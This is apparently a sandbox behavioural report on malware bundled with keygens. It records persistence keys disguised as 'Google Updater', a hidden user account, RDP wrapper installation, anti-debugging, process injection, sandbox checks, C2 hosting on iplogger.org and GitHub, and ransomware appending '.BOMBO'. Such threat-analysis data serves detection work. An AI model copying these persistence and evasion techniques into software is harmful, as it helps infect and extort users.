\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 2.0 = "\"C:\\ProgramData\\Google Updater 2.0\\ymy9m915c99k95m.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe\"" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6825da1e045502b22d4b02d4028214ab = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" .." svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 2.0 = "\"C:\\ProgramData\\Google Updater 2.0\\ymy9m915c99k95m.exe\"" Lonelyscreen.1.2.9.keygen.by.Paradox.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe\"" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\16.exe = "C:\\Windows\\System32\\16.exe" 16.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\6825da1e045502b22d4b02d4028214ab = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" .." svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Laivevdi = "C:\\Users\\Admin\\AppData\\Roaming\\Wioffo\\fecuat.exe" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Dokumen4 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Dibromob\\PRECONCE.vbs" 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\tenakna = "C:\\Users\\Admin\\Documents\\foldani.exe" foldani.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\feeed = "C:\\Windows\\system32\\pcalua.exe -a C:\\Users\\Admin\\AppData\\Roaming\\feeed.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe" explorer.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira OnlineInstaller.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Magic_File_v3_keygen_by_KeygenNinja.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VyprVPN.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA o37oc73i7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA foldani.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ymy9m915c99k95m.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ymy9m915c99k95m.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA o37oc73i7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA TaskMan.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA o37oc73i7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tacbvfff.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA update.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ymy9m915c99k95m.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA openme.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ymy9m915c99k95m.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA o37oc73i7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3DMark 11 Advanced Edition.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Lonelyscreen.1.2.9.keygen.by.Paradox.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 42f972925508a82236e8533567487761.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA o37oc73i7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA o37oc73i7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA o37oc73i7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mouse_2.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA o37oc73i7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2c01b007729230c415420ad641ad92eb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Archive.zip__ccacaxs2tbz2t6ob3e.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA oof.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tacbvfff.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA foldani.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ymy9m915c99k95m.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ymy9m915c99k95m.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ou55sg33s_1.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Program Files\desktop.ini 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI 16.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3870231897-2573482396-1083937135-1000\desktop.ini 16.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-3870231897-2573482396-1083937135-1000\desktop.ini 16.exe -
Indicator Removal: Clear Persistence 1 TTPs 3 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
description ioc pid Process 932 cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ymy9m915c99k95m.exe\DisableExceptionChainValidation oof.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\o37oc73i7.exe\DisableExceptionChainValidation ou55sg33s_1.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 15 iplogger.org 17 raw.githubusercontent.com 25 raw.githubusercontent.com 28 raw.githubusercontent.com 92 iplogger.org 95 iplogger.org 9 iplogger.org -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com 94 ip-api.com -
Maps connected drives based on registry 3 TTPs 42 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 mouse_2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum msiexec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 Magic_File_v3_keygen_by_KeygenNinja.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 update.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum openme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 Lonelyscreen.1.2.9.keygen.by.Paradox.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum foldani.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 foldani.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 ymy9m915c99k95m.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum 18.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum ymy9m915c99k95m.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 18.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 openme.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 tacbvfff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum ymy9m915c99k95m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum ymy9m915c99k95m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum 2c01b007729230c415420ad641ad92eb.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 2c01b007729230c415420ad641ad92eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum tacbvfff.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 tacbvfff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum VyprVPN.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 VyprVPN.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 ymy9m915c99k95m.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 TaskMan.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum mouse_2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Lonelyscreen.1.2.9.keygen.by.Paradox.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 ymy9m915c99k95m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Magic_File_v3_keygen_by_KeygenNinja.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum tacbvfff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum update.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum TaskMan.exe -
Modifies WinLogon 2 TTPs 7 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" update.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList update.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList update.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts update.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 7 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x001900000002ab4f-4.dat autoit_exe behavioral1/files/0x0006000000025b7b-217.dat autoit_exe behavioral1/files/0x000b000000025b88-314.dat autoit_exe behavioral1/files/0x000b000000025be7-337.dat autoit_exe behavioral1/memory/2556-359-0x00000000003C0000-0x00000000004AC000-memory.dmp autoit_exe behavioral1/files/0x001c00000002ab85-388.dat autoit_exe behavioral1/files/0x001900000002abd6-1000.dat autoit_exe -
Checks system information in the registry 2 TTPs 1 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer TaskMan.exe -
Drops file in System32 directory 13 IoCs
description ioc Process File created C:\Windows\system32\spoolsr.exe OnlineInstaller.tmp File created C:\Windows\system32\KeyHook64.dll OnlineInstaller.tmp File created C:\Windows\System32\16.exe 16.exe File opened for modification C:\Windows\System32\winmgmts:\localhost\ taskhost.exe File opened for modification C:\Windows\SysWOW64\exe\rutserv.pdb rutserv.exe File opened for modification C:\Windows\SysWOW64\symbols\exe\rutserv.pdb rutserv.exe File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 taskhost.exe File created C:\Windows\System32\rfxvmt.dll RDPWInst.exe File created C:\Windows\system32\MS.dat OnlineInstaller.tmp File created C:\Windows\system32\KH.dat OnlineInstaller.tmp File created C:\Windows\system32\usp20.dll OnlineInstaller.tmp File opened for modification C:\Windows\SysWOW64\rutserv.pdb rutserv.exe File created C:\Windows\system32\UP.dat OnlineInstaller.tmp -
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" reg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid Process 2976 1111.exe 2976 1111.exe 2976 1111.exe 2924 ou55sg33s_1.exe 4420 oof.exe 3220 explorer.exe 2580 explorer.exe 3220 explorer.exe 3220 explorer.exe 2580 explorer.exe 2580 explorer.exe 3220 explorer.exe 3220 explorer.exe 3220 explorer.exe 2300 openme.exe 4360 svchost.exe 2300 openme.exe 2300 openme.exe 2300 openme.exe 4360 svchost.exe 4360 svchost.exe 4360 svchost.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 3600 mouse_2.exe 908 msiexec.exe 2580 explorer.exe 908 msiexec.exe 908 msiexec.exe 908 msiexec.exe 2580 explorer.exe 3220 explorer.exe 2580 explorer.exe 2580 explorer.exe 3220 explorer.exe 5492 o37oc73i7.exe 5560 explorer.exe 5560 explorer.exe 5560 explorer.exe 2960 Magic_File_v3_keygen_by_KeygenNinja.exe 2960 Magic_File_v3_keygen_by_KeygenNinja.exe 2960 Magic_File_v3_keygen_by_KeygenNinja.exe 2960 Magic_File_v3_keygen_by_KeygenNinja.exe 5560 explorer.exe 5560 explorer.exe 5560 explorer.exe 904 Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe 904 Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe 904 Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe 904 Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe 5560 explorer.exe 1548 tacbvfff.exe 4768 Lonelyscreen.1.2.9.keygen.by.Paradox.exe 4768 Lonelyscreen.1.2.9.keygen.by.Paradox.exe 4768 Lonelyscreen.1.2.9.keygen.by.Paradox.exe 4768 Lonelyscreen.1.2.9.keygen.by.Paradox.exe 5176 o37oc73i7.exe 5240 explorer.exe 5240 explorer.exe 5240 explorer.exe 5240 explorer.exe 5240 explorer.exe 5240 explorer.exe -
Suspicious use of SetThreadContext 19 IoCs
description pid Process procid_target PID 4608 set thread context of 2924 4608 ou55sg33s_1.exe 445 PID 1604 set thread context of 4420 1604 oof.exe 454 PID 3040 set thread context of 908 3040 wwf[1].exe 468 PID 5464 set thread context of 5492 5464 o37oc73i7.exe 482 PID 1548 set thread context of 5828 1548 tacbvfff.exe 484 PID 5168 set thread context of 5176 5168 o37oc73i7.exe 490 PID 4612 set thread context of 3704 4612 o37oc73i7.exe 495 PID 964 set thread context of 1984 964 foldani.exe 501 PID 5652 set thread context of 3836 5652 o37oc73i7.exe 503 PID 5980 set thread context of 3336 5980 o37oc73i7.exe 509 PID 4256 set thread context of 1448 4256 o37oc73i7.exe 554 PID 1636 set thread context of 1048 1636 o37oc73i7.exe 563 PID 5068 set thread context of 3100 5068 o37oc73i7.exe 569 PID 332 set thread context of 5264 332 2.exe 586 PID 5264 set thread context of 3280 5264 2.exe 53 PID 5976 set thread context of 2016 5976 3.exe 626 PID 4956 set thread context of 3280 4956 18.exe 53 PID 4956 set thread context of 3280 4956 18.exe 53 PID 1932 set thread context of 7976 1932 21.exe 637 -
resource yara_rule behavioral1/files/0x0006000000025b81-304.dat upx behavioral1/files/0x0006000000025b80-303.dat upx behavioral1/files/0x0004000000025ccc-345.dat upx behavioral1/memory/2556-356-0x00000000003C0000-0x00000000004AC000-memory.dmp upx behavioral1/memory/2556-359-0x00000000003C0000-0x00000000004AC000-memory.dmp upx behavioral1/files/0x001900000002acb1-2018.dat upx behavioral1/memory/5712-2050-0x0000000000400000-0x00000000004A9000-memory.dmp upx behavioral1/memory/5712-2200-0x0000000000400000-0x00000000004A9000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Common Files\System\de-DE\wab32res.dll.mui 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-file-l1-1-0.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-80.png.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\SUCTION.WAV.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] 16.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Net.WebProxy.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-handle-l1-1-0.dll 16.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Serialization.Primitives.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond-TrebuchetMs.xml 16.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Text.Encoding.CodePages.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\Microsoft.Win32.Registry.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.IO.Pipes.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-100.png 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] 16.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.es-es.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.ServicePoint.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime2019_eula.txt.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\mscordaccore.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Diagnostics.Contracts.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RHeartbeatConfig.xml.id-48EE1B4B.[[email protected]].BOMBO 16.exe File created C:\Program Files\Java\jdk-1.8\legal\jdk\dynalink.md.id-48EE1B4B.[[email protected]].BOMBO 16.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\relaxngcc.md.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-100.png.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Globalization.Extensions.dll 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Private.Uri.dll 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-80.png.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\PREVIEW.GIF 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.dll 16.exe File opened for modification C:\Program Files\Microsoft Office\root\fre\StartMenu_Win10.mp4.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo.png.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo_small.png 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\coreclr.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.ComponentModel.EventBasedAsync.dll 16.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\PREVIEW.GIF.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui 16.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cryptix.md.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\public_suffix_list.dat.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Franklin Gothic.xml.id-48EE1B4B.[[email protected]].BOMBO 16.exe File created C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL048.XML.id-48EE1B4B.[[email protected]].BOMBO 16.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Reflection.Emit.ILGeneration.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\SmallLogoDev.png.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\basicstylish.dotx.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\word2013.dotx 16.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Text.RegularExpressions.dll.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-180.png.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN020.XML.id-48EE1B4B.[[email protected]].BOMBO 16.exe File opened for modification C:\Program 